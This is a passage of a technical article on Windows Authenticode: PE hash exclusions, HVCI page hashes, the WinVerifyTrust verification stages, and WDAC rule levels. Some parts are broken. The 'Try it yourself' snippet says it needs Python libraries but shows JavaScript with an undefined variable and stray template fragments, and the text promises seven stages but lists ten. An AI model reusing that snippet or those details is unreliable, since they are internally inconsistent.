&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Excluded region&lt;/th&gt;
&lt;th&gt;Why excluded&lt;/th&gt;
&lt;th&gt;Spec reference&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;OptionalHeader.CheckSum&lt;/code&gt; (4 bytes)&lt;/td&gt;
&lt;td&gt;The OS recomputes the optional-header checksum when servicing; signing over it would make every signature invalidate at first patch.&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Authenticode_PE.docx&lt;/code&gt; §3.1 [@authenticode-pe-docx]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY]&lt;/code&gt; (8 bytes)&lt;/td&gt;
&lt;td&gt;The pointer to the certificate table itself moves when a signature is added; signing over the pointer is a chicken-and-egg loop.&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Authenticode_PE.docx&lt;/code&gt; §3.1 [@authenticode-pe-docx]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;The certificate-table bytes themselves&lt;/td&gt;
&lt;td&gt;Same chicken-and-egg loop -- the signature cannot sign itself.&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Authenticode_PE.docx&lt;/code&gt; §3.1 [@authenticode-pe-docx]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;File-alignment padding after each section&lt;/td&gt;
&lt;td&gt;Padding can be different on different builds for harmless reasons (alignment, build-tool quirks); signing over it would punish those harmless differences.&lt;/td&gt;
&lt;td&gt;&lt;code&gt;Authenticode_PE.docx&lt;/code&gt; §3.1 [@authenticode-pe-docx]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The PE digest computed over the file with four regions excluded: the optional-header `CheckSum` field, the `IMAGE_DIRECTORY_ENTRY_SECURITY` data-directory entry, the certificate-table bytes themselves, and the file-alignment padding after each section. Because the excluded regions include the certificate-table area, the same hash remains valid after the signature is appended [@authenticode-pe-docx].
&lt;p&gt;The exclusion of the certificate-table bytes is the design move that makes the whole architecture work. The Authenticode hash is computed &lt;em&gt;first&lt;/em&gt;, signed, and then the signature is appended into the very region the hash excluded. After appending, the hash is still valid; verifying simply recomputes the hash with the same four regions excluded and compares.ASN.1 DER&apos;s tag-length-value shape means that, given enough patience, you can decode every level of the certificate table with nothing but a hex dump. This accessibility is also why parser bugs are particularly damaging: a verifier that re-encodes or normalises before hashing can be tricked into hashing different bytes than the bytes that get loaded -- the structural failure mode at the bottom of CVE-2013-3900 [@nvd-cve-2013-3900].&lt;/p&gt;
&lt;h3&gt;A separate, smaller hash per 4 KiB page&lt;/h3&gt;
&lt;p&gt;Authenticode supports an optional signed attribute, &lt;code&gt;SpcPeImagePageHashes2&lt;/code&gt;, with OID &lt;code&gt;1.3.6.1.4.1.311.2.3.2&lt;/code&gt; (SHA-256). It carries a sequence of &lt;code&gt;(RVA, hash)&lt;/code&gt; pairs, one hash per 4 KiB page of the PE image [@authenticode-pe-docx]. The older &lt;code&gt;1.3.6.1.4.1.311.2.3.1&lt;/code&gt; SHA-1 variant is effectively deprecated. Under &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;Hypervisor-Protected Code Integrity (HVCI)&lt;/a&gt;, the page hashes are validated at demand-fault time: when the OS faults in a page from disk, HVCI hashes the page and compares it to the signed page-hash entry before mapping the page as executable. Whole-file integrity checking at load is &lt;em&gt;not&lt;/em&gt; the same as runtime integrity checking at fault; page hashes are what closes that gap.ARM64 Windows configurations have used 4 KiB native pages on the systems that ship Authenticode page-hash enforcement to date. The page-hash attribute encodes RVAs into the on-disk image, so any future move to 16 KiB or 64 KiB page granularity would require a corresponding spec revision.&lt;/p&gt;

An optional signed attribute (OID `1.3.6.1.4.1.311.2.3.2` for SHA-256) carrying a sequence of `(RVA, SHA-256)` pairs, one per 4 KiB page of the PE image. The hashes are checked at demand-fault time by HVCI / Code Integrity, not just at load time [@authenticode-pe-docx].
&lt;h3&gt;The whole nest, in one picture&lt;/h3&gt;

flowchart TD
    PE[&quot;PE file on disk&quot;]
    OH[&quot;Optional header&quot;]
    DD[&quot;DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY] (entry 4)&quot;]
    WC[&quot;WIN_CERTIFICATE record&lt;br /&gt;(dwLength, wRevision, wCertificateType, bCertificate[])&quot;]
    SD[&quot;PKCS#7 / CMS SignedData&quot;]
    Certs[&quot;certificates: X.509 chain&quot;]
    SI[&quot;SignerInfo&quot;]
    Sa[&quot;signedAttrs&quot;]
    SIDC[&quot;encapContentInfo: SpcIndirectDataContent&quot;]
    SPI[&quot;data: SpcPeImageData (SPC_PE_IMAGE_DATAOBJ)&quot;]
    MD[&quot;messageDigest: Authenticode hash&quot;]
    PH[&quot;SpcPeImagePageHashes2 (optional)&quot;]
    ED[&quot;encryptedDigest: signature bytes&quot;]
    Ua[&quot;unsignedAttrs&quot;]
    TST[&quot;RFC 3161 TimeStampToken&lt;br /&gt;(OID 1.2.840.113549.1.9.16.2.14)&quot;]
    PE --&amp;gt; OH
    OH --&amp;gt; DD
    DD --&amp;gt; WC
    WC --&amp;gt; SD
    SD --&amp;gt; Certs
    SD --&amp;gt; SI
    SI --&amp;gt; Sa
    Sa --&amp;gt; SIDC
    SIDC --&amp;gt; SPI
    SIDC --&amp;gt; MD
    SIDC --&amp;gt; PH
    SI --&amp;gt; ED
    SI --&amp;gt; Ua
    Ua --&amp;gt; TST
&lt;h3&gt;Try it yourself&lt;/h3&gt;
&lt;p&gt;{`&lt;/p&gt;
Decode the four nesting levels of an Authenticode signature.
Requires: pip install pefile asn1crypto
&lt;p&gt;const catalogSignedInboxFile = {
  Path: &quot;C:\\Windows\\System32\\ntoskrnl.exe&quot;,
  // PowerShell: (Get-AuthenticodeSignature ntoskrnl.exe).SignatureType -&amp;gt; Catalog
  SignatureType: &quot;Catalog&quot;,
  Status: &quot;Valid&quot;,
  CatalogFile: &quot;C:\\Windows\\System32\\CatRoot\\{F750E6C3-...}\\Microsoft-Windows-Client-Drivers-Package&lt;del&gt;31bf3856ad364e35&lt;/del&gt;amd64~~10.0.x.y.cat&quot;,
  SignerCertificate: { Subject: &quot;CN=Microsoft Windows Production PCA 2011, ...&quot; }
};&lt;/p&gt;
&lt;p&gt;console.log(&quot;Embedded signature:&quot;, embeddedSignedBinary.SignatureType, embeddedSignedBinary.CatalogFile);
console.log(&quot;Catalog signature: &quot;, catalogSignedInboxFile.SignatureType, catalogSignedInboxFile.CatalogFile);
`}&lt;/p&gt;
&lt;p&gt;Once you can sign a hash instead of a file, and once you can pin a signing event to a moment in time that outlives the certificate, the rest of the architecture stops being a sequence of crypto choices and starts being a sequence of &lt;em&gt;policy&lt;/em&gt; choices: which roots do we trust for ring 0, which file-publisher tuples does this enterprise authorise, which drivers does Microsoft deny by hash? To see those policy choices in operation, watch a single &lt;code&gt;WinVerifyTrust&lt;/code&gt; call end to end.&lt;/p&gt;
&lt;h2&gt;6. A modern WinVerifyTrust call, end to end&lt;/h2&gt;
&lt;p&gt;A user double-clicks a Microsoft-signed &lt;code&gt;.exe&lt;/code&gt; on Windows 11 24H2. HVCI is on, Smart App Control is on, an enterprise App Control policy is loaded. The shell calls &lt;code&gt;ShellExecute&lt;/code&gt;. Before the OS hands control to the new process, the kernel&apos;s code-integrity stack (&lt;code&gt;ci.dll&lt;/code&gt;) and user-mode &lt;code&gt;WinVerifyTrust&lt;/code&gt; between them answer the question &lt;em&gt;&quot;is this binary trusted?&quot;&lt;/em&gt; in roughly the following seven stages.&lt;/p&gt;
&lt;h3&gt;Stage 1: read the certificate table&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ci.dll&lt;/code&gt; reads the optional header, finds &lt;code&gt;DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY]&lt;/code&gt;, walks the certificate-table region, and enumerates the &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; records. Dual signing is carried as a nested signature (&lt;code&gt;szOID_NESTED_SIGNATURE&lt;/code&gt;) inside the primary signature&apos;s &lt;code&gt;unsignedAttrs&lt;/code&gt; rather than as separate top-level records (for example a SHA-256 primary with a SHA-1 nested signature for older Windows 7 verifiers); the verifier selects the strongest signature its policy allows [@authenticode-pe-docx][@mslearn-pe-format].&lt;/p&gt;
&lt;h3&gt;Stage 2: decode the SignedData&lt;/h3&gt;
&lt;p&gt;For each candidate record with &lt;code&gt;wCertificateType == WIN_CERT_TYPE_PKCS_SIGNED_DATA&lt;/code&gt;, the verifier DER-decodes &lt;code&gt;bCertificate&lt;/code&gt; into a CMS &lt;code&gt;ContentInfo&lt;/code&gt;, then into a &lt;code&gt;SignedData&lt;/code&gt; structure [@rfc-5652]. The verifier reads &lt;code&gt;signerInfos&lt;/code&gt;, picks the signer (usually one), and extracts the signed and unsigned attributes.&lt;/p&gt;
&lt;h3&gt;Stage 3: verify the content type&lt;/h3&gt;
&lt;p&gt;The verifier confirms &lt;code&gt;encapContentInfo.eContentType == 1.3.6.1.4.1.311.2.1.4&lt;/code&gt; (&lt;code&gt;SpcIndirectDataContent&lt;/code&gt;), then decodes the inner structure and confirms &lt;code&gt;data.type == 1.3.6.1.4.1.311.2.1.15&lt;/code&gt; (&lt;code&gt;SPC_PE_IMAGE_DATAOBJ&lt;/code&gt;) [@authenticode-pe-docx]. The inner &lt;code&gt;messageDigest&lt;/code&gt; is the Authenticode hash this signature claims to cover; the &lt;code&gt;digestAlgorithm&lt;/code&gt; says how it was computed.&lt;/p&gt;
&lt;h3&gt;Stage 4: recompute the Authenticode hash&lt;/h3&gt;
&lt;p&gt;The verifier re-reads the PE file bytes, applies the four exclusions (&lt;code&gt;CheckSum&lt;/code&gt;, the SECURITY data-directory entry, the certificate-table bytes, and section-padding), hashes the remaining bytes with the claimed algorithm, and compares to &lt;code&gt;SpcIndirectDataContent.messageDigest&lt;/code&gt; [@authenticode-pe-docx]. If they differ, the signature is rejected.&lt;/p&gt;
&lt;h3&gt;Stage 5: validate page hashes under HVCI&lt;/h3&gt;
&lt;p&gt;If &lt;code&gt;SpcPeImagePageHashes2&lt;/code&gt; is attached and the running policy includes HVCI, the page-hash table is preserved across the verification call and consulted later by the secure kernel at demand-fault time [@authenticode-pe-docx]. The full-file Authenticode hash check is &lt;em&gt;necessary&lt;/em&gt; but not &lt;em&gt;sufficient&lt;/em&gt; for runtime integrity; pages on disk can be tampered after load by a kernel-level attacker who bypasses file-system protections. Page hashes are what closes that gap by re-checking each page at the moment it is mapped executable.&lt;/p&gt;
&lt;h3&gt;Stage 6: build the chain&lt;/h3&gt;
&lt;p&gt;The verifier collects the &lt;code&gt;certificates&lt;/code&gt; SET from the &lt;code&gt;SignedData&lt;/code&gt;, plus any AIA-fetched certificates needed to complete the chain, and tries to terminate the path at a trusted root. For kernel-mode loads, the legacy anchor is the &lt;code&gt;Microsoft Code Verification Root&lt;/code&gt;; for portal-signed drivers, the chain may instead terminate at one of the Microsoft Root Authority anchors. The KMCS policy page describes the Windows 10 1607+ kernel-mode anchors verbatim: &lt;em&gt;&quot;Microsoft Root Authority 2010, Microsoft Root Certificate Authority, Microsoft Root Authority&quot;&lt;/em&gt; with Secure Boot on [@mslearn-kmcs-policy]. For user-mode loads, the chain may terminate at any root in the system Trusted Root store; the enterprise&apos;s App Control policy narrows the trust further by referencing specific anchors at the RootCertificate / PcaCertificate rule level [@mslearn-select-types-of-rules].&lt;/p&gt;

The CryptoAPI function (`wintrust.dll!WinVerifyTrust`) that orchestrates the Authenticode verification pipeline: certificate-table read, SignedData decode, content-type check, Authenticode-hash recomputation, optional page-hash association, chain build, catalog fallback for unsigned PEs, and timestamp validation. It returns a success or specific error code; the caller (UAC, SmartScreen, `ci.dll`, WDAC) interprets the result against its own policy.

The Windows kernel-mode component that enforces the Kernel-Mode Code Signing policy on driver loads (Vista x64 and later [@wiki-kernel-patch-protection][@mslearn-kmcs-policy]) and, under HVCI, evaluates page hashes at fault time. `ci.dll` is the kernel-side caller of `WinVerifyTrust` semantics for driver loads.

The historical kernel-mode trust anchor whose name appears in Microsoft&apos;s KMCS documentation and whose intermediate cross-signed third-party code-signing CAs for pre-July-2015 drivers [@mslearn-kmcs-policy]. Microsoft Learn does not publish a single canonical page with the root&apos;s SHA-1 / SHA-256 thumbprint, validity dates, or issuance year; in practice the thumbprint is read by running `certutil -store` on a recent Windows system.
&lt;p&gt;The Microsoft Code Verification Root metadata absence is real: although the root is named in the KMCS policy document [@mslearn-kmcs-policy], no Microsoft Learn URL publishes its thumbprint or validity dates on a stable page. Practitioners should reference the root by name in policy and treat the actual thumbprint as something to be enumerated via &lt;code&gt;certutil -store&lt;/code&gt; on the running system rather than copy-pasted from a published document.&lt;/p&gt;
&lt;h3&gt;Stage 7: catalog fallback for unsigned PEs&lt;/h3&gt;
&lt;p&gt;If the PE has no embedded signature, the verifier computes the Authenticode hash and queries &lt;code&gt;CryptSvc&lt;/code&gt;: is this hash a member of any installed catalog under &lt;code&gt;%SystemRoot%\System32\CatRoot\&lt;/code&gt;? If yes, the verifier uses the catalog&apos;s signer as the effective signer for the PE [@mslearn-catalog-files][@mslearn-authenticode-driver]. Cross-system files installed by Windows Update (most drivers, most inbox executables) take this path.&lt;/p&gt;
&lt;h3&gt;Stage 8: validate the RFC 3161 timestamp&lt;/h3&gt;
&lt;p&gt;If the unsigned attributes carry an RFC 3161 token (&lt;code&gt;szOID_RFC3161_counterSign&lt;/code&gt;, OID &lt;code&gt;1.3.6.1.4.1.311.3.3.1&lt;/code&gt;), the verifier decodes it, validates the TSA&apos;s chain, extracts &lt;code&gt;genTime&lt;/code&gt;, and confirms the signing certificate was valid at &lt;code&gt;genTime&lt;/code&gt; [@rfc-3161]. This is how a 2010 signature still verifies in 2026: not because the 2010 certificate is still valid, but because a TSA attested at signing time that the signature existed when the certificate was valid.&lt;/p&gt;
&lt;h3&gt;Stage 9: WDAC policy evaluation&lt;/h3&gt;
&lt;p&gt;With cryptographic verdicts in hand, the App Control policy engine evaluates the file against the active policy: does any allow rule match, does any deny rule match, including the default-on Vulnerable Driver Blocklist supplemental deny [@mslearn-recommended-driver-block-rules]? The matching rule -- by Hash, FileName, Publisher, FilePublisher, WHQL, WHQLPublisher, WHQLFilePublisher, LeafCertificate, PcaCertificate, or RootCertificate level [@mslearn-select-types-of-rules] -- decides the final outcome. Audit-mode hits produce event ID 3076; enforcement-mode blocks produce event ID 3077 [@mslearn-event-id-explanations].&lt;/p&gt;
&lt;h3&gt;Stage 10: legacy parser hardening, if opted in&lt;/h3&gt;
&lt;p&gt;A hardened environment will also have &lt;code&gt;EnableCertPaddingCheck=1&lt;/code&gt; set [@nvd-cve-2013-3900], enabling the strict parser that rejects the CVE-2013-3900 appended-data form. CISA added the CVE to its Known Exploited Vulnerabilities catalogue on 10 January 2022 with a federal due date of 10 July 2022 [@nvd-cve-2013-3900]; environments subject to federal compliance regimes treat this as mandatory.For practitioners: the registry key needs to be set in both &lt;code&gt;HKLM\Software\Microsoft\Cryptography\Wintrust\Config&lt;/code&gt; and the matching &lt;code&gt;Wow6432Node&lt;/code&gt; path, because the 32-bit and 64-bit &lt;code&gt;WinVerifyTrust&lt;/code&gt; code paths read separate copies. Setting only one and rebooting is one of the more common configuration mistakes in hardened-baseline rollouts.&lt;/p&gt;

flowchart TD
    Start[&quot;ShellExecute / driver load&quot;]
    CT[&quot;Read PE certificate table&quot;]
    Decode[&quot;Decode WIN_CERTIFICATE -&amp;gt; CMS SignedData&quot;]
    OID{&quot;eContentType =&lt;br /&gt;SpcIndirectDataContent?&quot;}
    Hash[&quot;Recompute Authenticode hash&quot;]
    HashOK{&quot;Hash matches&lt;br /&gt;messageDigest?&quot;}
    Chain[&quot;Build certificate chain&quot;]
    Cat[&quot;Catalog fallback?&lt;br /&gt;(if PE unsigned)&quot;]
    TS[&quot;Validate RFC 3161 token&quot;]
    PHash[&quot;Associate SpcPeImagePageHashes2&lt;br /&gt;(HVCI fault-time check)&quot;]
    Pol[&quot;WDAC policy evaluation&quot;]
    EPC[&quot;EnableCertPaddingCheck&lt;br /&gt;strict parser (if opt-in)&quot;]
    Done[&quot;LOAD or DENY&quot;]
    Start --&amp;gt; CT --&amp;gt; Decode --&amp;gt; OID
    OID --&amp;gt;|yes| Hash
    OID --&amp;gt;|no| Done
    Hash --&amp;gt; HashOK
    HashOK --&amp;gt;|yes| Chain
    HashOK --&amp;gt;|no| Done
    Chain --&amp;gt; Cat --&amp;gt; TS --&amp;gt; PHash --&amp;gt; EPC --&amp;gt; Pol --&amp;gt; Done
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; There is no separate certificate table per trust subsystem. UAC, SmartScreen, &lt;code&gt;ci.dll&lt;/code&gt;, WDAC, and the catalog-fallback path all read the &lt;em&gt;same&lt;/em&gt; bytes inside the same &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt; record. What differs is which fields each consumer cares about and what policy each consumer overlays on top. Once you read the on-disk structures, every later trust decision is predictable.&lt;/p&gt;
&lt;/blockquote&gt;

`WinVerifyTrust` does not execute the binary. It does not appraise behaviour or reputation -- that is SmartScreen&apos;s job, downstream. It does not verify runtime page integrity -- HVCI does, in the secure kernel, at demand-fault time. It does not enforce the App Control policy -- the policy engine does, downstream. It does not check OCSP unless the caller opts in; chain-revocation behaviour is governed by `WinVerifyTrust` flags supplied by the caller. The function answers only the narrow cryptographic question: does the SignedData blob parse, does the recomputed hash match, does the chain build, and (if a token is attached) did the signing event happen inside the signing certificate&apos;s validity window?
&lt;p&gt;By the seventh stage of this pipeline, the answer to &quot;is this binary trusted?&quot; is no longer a yes-or-no statement about cryptography. It is a &lt;em&gt;composite&lt;/em&gt; of cryptographic verdicts (signature integrity, hash match, chain build, timestamp validity, page hashes) and &lt;em&gt;policy&lt;/em&gt; verdicts (allowed by WDAC, not on the blocklist). Authenticode supplies the inputs to a policy; WDAC writes the policy. Let us look at the policy language.&lt;/p&gt;
&lt;h2&gt;7. WDAC rule levels: Authenticode as policy input, not policy itself&lt;/h2&gt;
&lt;p&gt;App Control for Business (WDAC) is where the Authenticode primitives finally surface to administrators as policy. The &lt;code&gt;SignerInfo&lt;/code&gt;, the subject CN of the leaf certificate, the file&apos;s &lt;code&gt;OriginalFileName&lt;/code&gt; and &lt;code&gt;ProductVersion&lt;/code&gt; from the version resource, the page-hash table, even the choice of catalog signer -- all of them become inputs to a small rule language.&lt;/p&gt;
&lt;h3&gt;Rule levels: what Authenticode field each level consults&lt;/h3&gt;
&lt;p&gt;The verbatim rule-level catalogue from Microsoft Learn is [@mslearn-select-types-of-rules]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Rule level&lt;/th&gt;
&lt;th&gt;Authenticode field(s) consulted&lt;/th&gt;
&lt;th&gt;Example use case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Hash&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Authenticode hash of the file&lt;/td&gt;
&lt;td&gt;Pinning a single binary by exact bytes; brittle across patches.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;FileName&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;OriginalFileName&lt;/code&gt; from the PE version resource&lt;/td&gt;
&lt;td&gt;Convenience for inbox files; not cryptographic.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;FilePath&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filesystem path&lt;/td&gt;
&lt;td&gt;UNC or absolute path; not cryptographic. Use sparingly.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SignedVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Publisher + &lt;code&gt;OriginalFileName&lt;/code&gt; + version range&lt;/td&gt;
&lt;td&gt;Allow a publisher&apos;s binary at a given version or higher.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Publisher&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Issuing CA + leaf-cert subject CN&lt;/td&gt;
&lt;td&gt;Allow anything signed by a given vendor under a given CA.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;FilePublisher&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Publisher + &lt;code&gt;OriginalFileName&lt;/code&gt; + minimum &lt;code&gt;FileVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Allow a specific binary from a specific vendor at min version.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WHQL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The Windows Hardware Quality Labs EKU&lt;/td&gt;
&lt;td&gt;Allow any WHQL-signed driver.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WHQLPublisher&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;WHQL EKU + leaf-cert subject CN&lt;/td&gt;
&lt;td&gt;Allow WHQL drivers from a specific OEM.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;WHQLFilePublisher&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;WHQL EKU + &lt;code&gt;OriginalFileName&lt;/code&gt; + min &lt;code&gt;FileVersion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The strictest driver rule.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;LeafCertificate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Leaf cert subject + issuer&lt;/td&gt;
&lt;td&gt;Pin to a specific signing cert.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;PcaCertificate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The PCA (intermediate) cert&lt;/td&gt;
&lt;td&gt;Useful for &quot;anything Microsoft-signed&quot; without enumerating leaves.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RootCertificate&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;The root anchor&lt;/td&gt;
&lt;td&gt;Broadest; usually too coarse.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Policy options&lt;/h3&gt;
&lt;p&gt;App Control policies are XML documents with a &lt;code&gt;&amp;lt;Rules&amp;gt;&lt;/code&gt; section that toggles broad behavioural options [@mslearn-select-types-of-rules]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;0 Enabled:UMCI&lt;/code&gt;&lt;/strong&gt; -- &lt;em&gt;&quot;App Control policies restrict both kernel-mode and user-mode binaries. By default, only kernel-mode binaries are restricted. Enabling this rule option validates user mode executables and scripts&quot;&lt;/em&gt; [@mslearn-select-types-of-rules].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;2 Required:WHQL&lt;/code&gt;&lt;/strong&gt; -- &lt;em&gt;&quot;By default, kernel drivers that aren&apos;t Windows Hardware Quality Labs (WHQL) signed are allowed to run. Enabling this rule requires that every driver is WHQL signed and removes legacy driver support&quot;&lt;/em&gt; [@mslearn-select-types-of-rules].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;8 Required:EV Signers&lt;/code&gt;&lt;/strong&gt; -- documented but, per the same Microsoft Learn page, &lt;em&gt;&quot;This option isn&apos;t currently supported.&quot;&lt;/em&gt;The Required:EV Signers option is in every published rule-options table but never makes it past parsing today. The EV requirement is enforced contractually via the Hardware Developer Center submission gate, not via the rule option. Treat it as documentation of intent rather than runtime enforcement.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Vulnerable Driver Blocklist is shipped as a &lt;em&gt;supplemental&lt;/em&gt; deny policy that overlays the user&apos;s primary policy. From Windows 11 22H2 onward it is default-on and automatically enforced under HVCI, Smart App Control, or S Mode [@mslearn-recommended-driver-block-rules]. Updates arrive quarterly. The blocklist is deliberately conservative: Microsoft&apos;s own documentation acknowledges &lt;em&gt;&quot;It&apos;s often necessary for us to hold back some blocks to avoid breaking existing functionality while we work with our partners who are engaging their users to update to patched versions&quot;&lt;/em&gt; [@mslearn-recommended-driver-block-rules].&lt;/p&gt;

The post-2024 rename of Windows Defender Application Control [@mslearn-appcontrol-root]; a code-integrity policy language that consumes Authenticode primitives (chain, leaf-cert subject, `OriginalFileName`, version, WHQL EKU, page-hash table, embedded-vs-catalog provenance) as inputs to administrator-authored allow and deny rules.

A WDAC rule level that allows or denies a binary if it is signed by a given Publisher (issuing CA + leaf-cert subject CN) **and** the PE&apos;s `OriginalFileName` matches **and** the PE&apos;s `FileVersion` is at or above a minimum. The tightest commonly used rule level; brittle across self-updating applications whose binaries change without warning [@mslearn-select-types-of-rules][@mslearn-use-code-signing].
&lt;h3&gt;A worked example&lt;/h3&gt;
&lt;p&gt;Generating a FilePublisher rule for a Microsoft-signed binary on PowerShell:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;New-CIPolicyRule -FilePath &quot;C:\Path\To\App.exe&quot; -Level FilePublisher
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;produces a &lt;code&gt;&amp;lt;FileRule&amp;gt;&lt;/code&gt; whose XML carries the issuing CA, the leaf-cert subject CN, the &lt;code&gt;OriginalFileName&lt;/code&gt; from the version resource, and a &lt;code&gt;MinimumFileVersion&lt;/code&gt; attribute. Every one of those fields is a direct read of the Authenticode &lt;code&gt;SignerInfo&lt;/code&gt; and the PE version resource; nothing in the rule generation step talks to Microsoft. The administrator owns the rule.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s own guidance is verbatim: &lt;em&gt;&quot;Be aware of self-updating apps, as their app binaries may change without your knowledge&quot;&lt;/em&gt; [@mslearn-use-code-signing]. FilePublisher rules pin a minimum version; if a self-updating app rolls out a build with a different &lt;code&gt;OriginalFileName&lt;/code&gt; casing, or with &lt;code&gt;ProductVersion&lt;/code&gt; changes that some packagers reuse as &lt;code&gt;FileVersion&lt;/code&gt;, the rule silently stops matching. For self-updating apps, prefer &lt;code&gt;Publisher&lt;/code&gt; (CA + subject CN only) and accept the looser blast radius.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Operational tip: audit-mode hits write event ID 3076 to the &lt;em&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/em&gt; channel, enforcement-mode blocks write event ID 3077 [@mslearn-event-id-explanations]. Stage every policy in audit mode for at least one full patch cycle before flipping to enforcement; the 3076 stream is your inventory of what the rules would have denied.&lt;/p&gt;
&lt;p&gt;WDAC&apos;s vocabulary makes one structural choice explicit that the article has been implicit about until now: trust is &lt;em&gt;administrator-authored&lt;/em&gt;, not &lt;em&gt;vendor-authored&lt;/em&gt;. The cryptographic identity is supplied by the same Authenticode primitives we just dissected; the policy is whatever the organisation writes. Before we look at the limits of what this stack can prove, one quick detour into how other operating systems have approached the same problem.&lt;/p&gt;
&lt;h2&gt;8. Catalog-vs-embedded across operating systems&lt;/h2&gt;
&lt;p&gt;Windows is unusual in two specific ways: it stores the catalog on the endpoint, and it refreshes the catalog through the OS update channel. No other mainstream OS does both.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Signature carrier&lt;/th&gt;
&lt;th&gt;Catalog model?&lt;/th&gt;
&lt;th&gt;Transparency log?&lt;/th&gt;
&lt;th&gt;Counter-signing for longevity&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows (Authenticode)&lt;/td&gt;
&lt;td&gt;PKCS#7 / CMS SignedData inside &lt;code&gt;WIN_CERTIFICATE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Yes -- &lt;code&gt;.cat&lt;/code&gt; files in &lt;code&gt;CatRoot&lt;/code&gt;, refreshed by Windows Update [@mslearn-catalog-files]&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Yes -- RFC 3161 token as unsigned attribute [@rfc-3161]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;macOS&lt;/td&gt;
&lt;td&gt;Apple-issued code signature + Notarization ticket; ticket stapled to artefact or fetched online [@apple-notarization]&lt;/td&gt;
&lt;td&gt;No -- Notarization ticket attests, but there is no on-disk &quot;list of hashes&quot; structure&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Stapled ticket effectively gives a signing-time guarantee; no third-party TSA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux IMA / EVM&lt;/td&gt;
&lt;td&gt;Extended-attribute signatures on individual files [@linux-ima-wiki]&lt;/td&gt;
&lt;td&gt;No -- per-file &lt;code&gt;security.ima&lt;/code&gt; xattr&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Out of scope; appraised against locally trusted keyring&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Android&lt;/td&gt;
